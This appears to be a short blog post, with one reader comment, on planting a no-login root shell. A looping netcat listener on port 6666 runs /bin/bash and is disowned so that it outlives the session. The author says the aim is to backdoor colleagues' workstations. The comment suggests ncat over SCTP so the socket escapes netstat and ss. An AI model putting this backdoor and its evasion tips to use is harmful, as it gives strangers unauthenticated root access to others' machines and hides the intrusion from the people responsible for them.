You could sometimes be lazy enough to willing have direct root shell access (no login required). A really simple solution exists again, redirecting the socket directly to /bin/sh (or better, /bin/bash) launched by an UID 0 account.
I have 2 basic solutions for that:
- netcat
- inetd
The inetd method is more adapted to Unix system where it often comes in default configuration. Netcat, on the other side, is often found in Linux systems. With netcat, just use:
$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&
This will background your infinite loop (this is a bit dirty...). It is unforunately completely un-stealth, as the netcat process will be seen in ps and netstat returns. Furthermore, if you kill the session used to launch the loop, the current netcat job will be attached to pid 1 and the loop will stop.
An easy solution to let the "while" loop running, attached to a lower level pid (e.g. pid 1) is to "disown" it from your current session:
before disowning:
├─gnome-terminal─┬─bash───pstree
│ ├─bash
│ ├─bash───bash───netcat
after disowning:
init─┬─6*[agetty]
├─bash───netcat
To do this, a very simple bash builtin command: disown!
$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&
[1] 3295
$ jobs
[1]+ Running while 'true'; do
netcat -l -p 6666 -e /bin/bash;
done &
$ disown %1
Next time, I will check some (x)inetd tricks to backdoor even more colleagues' stations.
Actually, to be a little more stealth, it is possible to use the `ncat' tool from nmap with --sctp option, instead of netcat.
ReplyDeleteI have noticed that neither netstat nor ss displays any info about sctp sockets.